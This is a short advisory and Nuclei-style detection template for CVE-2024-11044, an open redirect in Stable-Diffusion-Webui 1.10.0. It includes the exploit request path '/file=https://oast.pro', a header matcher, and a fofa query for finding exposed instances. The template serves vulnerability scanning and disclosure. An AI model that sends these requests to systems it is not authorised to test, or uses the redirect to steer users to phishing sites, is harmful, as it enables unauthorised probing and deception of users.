An open redirect vulnerability exists in Stable-Diffusion-Webui 1.10.0, where the file parameter in the /file= endpoint can be manipulated to redirect users to malicious websites. This could facilitate phishing attacks by tricking users into visiting attacker-controlled URLs.
PoC代码[已公开]
id: CVE-2024-11044
info:
name: Stable Diffusion Webui 1.10.0 - Open Redirect
author: DhiyaneshDK
severity: medium
description: |
An open redirect vulnerability exists in Stable-Diffusion-Webui 1.10.0, where the file parameter in the /file= endpoint can be manipulated to redirect users to malicious websites. This could facilitate phishing attacks by tricking users into visiting attacker-controlled URLs.
reference:
- https://huntr.com/bounties/ee942e5e-4987-4f81-ba83-014fec6b33b3
classification:
epss-score: 0.004
epss-percentile: 0.59995
metadata:
verified: true
max-request: 1
fofa-query: body="stable-diffusion-webui"
tags: cve,cve2024,huntr,redirect,oss,stable_diffusion_webui,automatic1111,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains_any(tolower(body), "stable-diffusion-webui", "k-diffusion", "content=\"stable diffusion")'
internal: true
- method: GET
path:
- "{{BaseURL}}/file=https://oast.pro"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
# digest: 4a0a00473045022100b1aeccbe85b42eb82c5820518159eff71520710c4ecf8e4d4b2f6d2413db8eb30220239e2dc46b3fedc35a4f02137fa92cefd284ee95f40e264decb0a6319272a627:922c64590222798bb761d5b6d8e72950